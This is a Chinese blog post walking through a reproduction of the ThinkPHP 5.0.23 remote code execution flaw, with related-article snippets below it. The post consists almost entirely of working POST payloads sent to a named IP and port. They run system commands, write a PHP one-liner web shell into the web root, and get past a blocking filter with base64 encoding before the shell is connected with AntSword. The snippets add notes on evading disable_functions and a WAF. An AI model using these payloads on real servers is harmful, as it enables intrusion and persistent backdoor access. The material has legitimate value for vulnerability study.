复现ThinkPHP5 5.0.23远程代码执行漏洞

最新推荐文章于 2023-03-20 09:35:41 发布
最新推荐文章于 2023-03-20 09:35:41 发布
阅读量3.4k 收藏 2
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lyh0558/article/details/124159200
版权

访问/index.php?s=captcha页面,出现报错

 

执行whoami

http://159.75.16.25:8089/index.php?s=captcha(POST)_method=__construct&filter[]=system&method=get&get[]=whoami

 

查看文件目录

 

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

 

 

写入一句话木马

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo <?php @eval($_POST['root009']); ?>  >>/var/www/public/1.php

 

发现被拦截无法写入,通过base64编码绕过

http:// 159.75.16.25:8089/index.php?s=captcha(POST)_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3Jvb3QwMDknXSk7Pz5iYmI=  | base64 -d  >>/var/www/public/shell.php

此处手滑多写了两个

 用蚁剑连接

 

 

 

 

 

燃烧着的风
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
PHP disable_function绕过
goddemon
09-11 462
disable_functions 典型禁用函数 绕过的几个思路 最基础的两个绕法 ①寻找没有被禁用的函数 PHP 中执行命令的函数有-->因此找没有禁用掉的就好了 system,shell_exec,passthru,exec,popen,proc_open,pcntl_exec,mail,putenv,apache_setenv,mb_send_mail,assert,dl,set_time_limit,ignore_user_abort,symlink,link,map_open,imap_m
Thinkphp绕过宝塔getshell
热门推荐
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-07 1万+
可以看到直接被拦了,经测试这里是敏感函数字符拦截,大部分有用的敏感函数都被拦了,这里面被拦的是phpinfo() Emmmm,怎么办呢。。。。。 直接执行代码不行,那么就写入代码吧,用file_put_contents()函数进行写入。 但这里又有一个问题,正常的写入由于请求参数中带有敏感字符一样会被拦,并且使用小马执行调用敏感函数的时候也会被拦 所以得配合点黑科技,使用特殊......
php enable_dl,【安全红队】PHP绕过disable_function限制
weixin_32025789的博客
03-26 924
上 利用环境变量和系统组件在维护网站时,为了安全,运维人员会禁用PHP的一些“危险”函数,将其写在 php.ini 配置文件中,就是我们所说的 disable_functions 了。例如:passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,...
简单讲解如何绕过PHP disable_function
h0ld1rs的博客
11-01 4270
前言 在渗透测试中,有时遇到拿到webshell后无法执行命令的情况,为了成功提权,需要我们绕过disable_function disable_function简介 disable_functions是php.ini中的一个设置选项,可以用来设置PHP环境禁止使用某些函数,通常是网站管理员为了安全起见,用来禁用某些危险的命令执行函数等。(eval并非PHP函数,放在disable_functions中是无法禁用的,若要禁用需要用到PHP的扩展Suhosin。) 绕过方法 1. 寻找未禁用的函数 黑名单
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE)漏洞,该漏洞允许攻击者在服务器上执行任意代码。 该漏洞是由于 ThinkPHP 的路由机制存在缺陷,攻击者可以通过构造特殊的 URL 来...
thinkphp5远程执行代码漏洞补丁.zip
04-17
thinkphp5远程执行代码漏洞补丁
宝塔面板eval防护及木马发(thinkphp5.0.23)
weixin_39873598的博客
01-31 4877
背景:网站被挂马,并且被改动了index.php。导致显示的入口文件为挂马文件 1、查看被攻击的当天的访问日志。  tail www.***-access_log 如图所示,我们看到日志的日期格式为[31/Jan/2019] 然后过滤到当天的查询日志,并保存文件 cat www.***-access_log | grep "30/Jan/2019" &gt; /tmp/2019-...
[GYCTF2020]EasyThinking Thinkphp6.0任意文件操作漏洞 绕过disable_function
scrawman的博客
11-28 2341
[GYCTF2020]EasyThinking 一开始还以为是XSS漏洞,因为搜索记录会被保存。后来查了才知道是Thinkphp 6.0框架的任意文件操作漏洞。先注册一个账号登录,登录时抓包修改Session id为php文件名,长度是32位 session文件在/runtime/session/目录下,这是默认的。文件名是sess_加我们刚刚写的32位字符串:sess_0123456789012345678901234567.php。 我们可以先来看一下此时这个文件里有什么 然后我们搜索一下再看这个文
PHP7.x的 PHP-FPM 存在远程代码执行漏洞
kuzina111的博客
10-29 4087
据外媒 ZDNet 的报道,PHP 7.x 中最近修的一个远程代码执行漏洞正被恶意利用,并会导致攻击者控制服务器。编号为CVE-2019-11043的漏洞允许攻击者通过向目标服务器发送特制的 URL,即可在存在漏洞的服务器上执行命令。漏洞利用的PoC代码也已在 GitHub 上发布。 一旦确定了易受攻击的目标,攻击者便可以通过在URL 中附加'?a=' 以发送特制请求到易受攻...
代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8
m0_52341820的博客
04-14 954
漏洞执行命令的原理: 两个条件: 用户能够函数的输入 存在可以执行代码的危险函数。 如何预防命令执行漏洞: PHP内置的两个函数可以有效防止命令执行:  1. escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。资料参考:http://cn.php.net/manual/zh/function.escapeshellarg.php
buuctf [ThinkPHP]5.0.23-Rce
qq_1873822的博客
03-14 1157
poc POST /index.php?s=captcha HTTP/1.1 Host: yuorip Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form.
Thinkphp5-0-X远程代码执行漏洞
qq_40624810的博客
11-09 784
参考博客:https://www.cnblogs.com/303donatello/p/12721587.html https://blog.csdn.net/qq_45521281/article/details/105907276 其实后面的&test=-1参数没有意义,只要有captcha就行 在post里加上我们要提交的参数 _method=__construct&filter[]=phpinfo&method=GET 提交...
ThinkPHP5系列远程代码执行漏洞(详细)
weixin_53730939的博客
03-20 7936
ThinkPHP5系列远程代码执行漏洞(详细)
ThinkPHP漏洞总结(利用)
yangbz123的博客
04-26 1万+
ThinkPHP介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ...
ThinkPHP 5.0 * 远程代码执行漏洞分析
a1b2c3是弱口令
01-11 1万+
ThinkPHP 5.0 * 远程代码执行全版本通杀 本文主要以官网下载的5.0.23 完整版(thinkphp_5.0.23_with_extend.zip)为例分析。 Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php) 该类可以实对HTTP请求的一些设置。 其中成员函数method用来获取当前请求类型,其定义如下: ...
ThinkPHP漏洞大全
FY10033的博客
05-04 1万+
tp5payload大全 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection tp5参考文献 https://blog.csdn.net/weixin_40709439/article/details/86564457 tp版本发 1.使用错误的路径 2.采用错误的参数 1.版本5.0.x<5.0.23 1.0 5.0.x-5.0.23通杀RCE-payload # 第一个 http://127.0.0.1/cms/thi
thinkphp5.0.23rce漏洞
最新发布
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值